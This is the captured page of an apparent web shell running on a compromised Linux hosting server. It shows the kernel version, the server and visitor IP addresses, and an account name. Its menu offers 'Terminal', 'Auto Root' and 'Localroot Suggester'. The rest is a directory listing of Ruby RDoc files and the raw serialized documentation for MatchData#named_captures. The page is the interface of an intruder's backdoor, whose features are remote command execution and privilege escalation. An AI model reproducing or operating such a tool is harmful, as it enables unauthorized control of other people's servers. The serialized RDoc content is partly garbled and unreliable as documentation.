Linux server1.dn-server.com 4.18.0-553.89.1.lve.el8.x86_64 #1 SMP Wed Dec 10 13:58:50 UTC 2025 x86_64
LiteSpeed
Server IP : 195.201.204.189 & Your IP : 216.73.216.60
Domains :
Cant Read [ /etc/named.conf ]
User : beriska1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby33 /
share /
ri /
system /
MatchData /
Delete
Unzip
Name
Size
Permission
Date
Action
%3d%3d-i.ri
432
B
-rw-r--r--
2026-04-07 17:22
%5b%5d-i.ri
1.46
KB
-rw-r--r--
2026-04-07 17:22
begin-i.ri
1.42
KB
-rw-r--r--
2026-04-07 17:22
byteoffset-i.ri
824
B
-rw-r--r--
2026-04-07 17:22
captures-i.ri
684
B
-rw-r--r--
2026-04-07 17:22
cdesc-MatchData.ri
3.18
KB
-rw-r--r--
2026-04-07 17:22
deconstruct-i.ri
663
B
-rw-r--r--
2026-04-07 17:22
deconstruct_keys-i.ri
890
B
-rw-r--r--
2026-04-07 17:22
end-i.ri
1.38
KB
-rw-r--r--
2026-04-07 17:22
eql%3f-i.ri
477
B
-rw-r--r--
2026-04-07 17:22
hash-i.ri
449
B
-rw-r--r--
2026-04-07 17:22
inspect-i.ri
846
B
-rw-r--r--
2026-04-07 17:22
length-i.ri
503
B
-rw-r--r--
2026-04-07 17:22
match-i.ri
1.05
KB
-rw-r--r--
2026-04-07 17:22
match_length-i.ri
1.18
KB
-rw-r--r--
2026-04-07 17:22
named_captures-i.ri
1.34
KB
-rw-r--r--
2026-04-07 17:22
names-i.ri
860
B
-rw-r--r--
2026-04-07 17:22
offset-i.ri
1.55
KB
-rw-r--r--
2026-04-07 17:22
post_match-i.ri
807
B
-rw-r--r--
2026-04-07 17:22
pre_match-i.ri
760
B
-rw-r--r--
2026-04-07 17:22
regexp-i.ri
491
B
-rw-r--r--
2026-04-07 17:22
size-i.ri
523
B
-rw-r--r--
2026-04-07 17:22
string-i.ri
595
B
-rw-r--r--
2026-04-07 17:22
to_a-i.ri
576
B
-rw-r--r--
2026-04-07 17:22
to_s-i.ri
683
B
-rw-r--r--
2026-04-07 17:22
values_at-i.ri
1.1
KB
-rw-r--r--
2026-04-07 17:22
Save
Rename
U:RDoc::AnyMethod[iI"named_captures:ETI"MatchData#named_captures;TF:privateo:RDoc::Markup::Document:@parts[o:RDoc::Markup::Paragraph; [I"+Returns a hash of the named captures; ;TI"Leach key is a capture name; each value is its captured string or +nil+:;To:RDoc::Markup::BlankLine o:RDoc::Markup::Verbatim; [I"0m = /(?<foo>.)(.)(?<bar>.+)/.match("hoge") ;TI"/# => #<MatchData "hoge" foo:"h" bar:"ge"> ;TI"5m.named_captures # => {"foo"=>"h", "bar"=>"ge"} ;TI" ;TI"&m = /(?<a>.)(?<b>.)/.match("01") ;TI"(# => #<MatchData "01" a:"0" b:"1"> ;TI"3m.named_captures #=> {"a" => "0", "b" => "1"} ;TI" ;TI"&m = /(?<a>.)(?<b>.)?/.match("0") ;TI"'# => #<MatchData "0" a:"0" b:nil> ;TI"3m.named_captures #=> {"a" => "0", "b" => nil} ;TI" ;TI"&m = /(?<a>.)(?<a>.)/.match("01") ;TI"(# => #<MatchData "01" a:"0" a:"1"> ;TI"'m.named_captures #=> {"a" => "1"} ;T:@format0o; ; [I"4If keyword argument +symbolize_names+ is given ;TI">a true value, the keys in the resulting hash are Symbols:;T@o;; [I"&m = /(?<a>.)(?<a>.)/.match("01") ;TI"(# => #<MatchData "01" a:"0" a:"1"> ;TI"<m.named_captures(symbolize_names: true) #=> {:a => "1"};T; 0: @fileI" re.c;T:0@omit_headings_from_table_of_contents_below0I"4named_captures(symbolize_names: false) -> hash ;T0[ I"(p1 = {});T@*FI"MatchData;TcRDoc::NormalClass00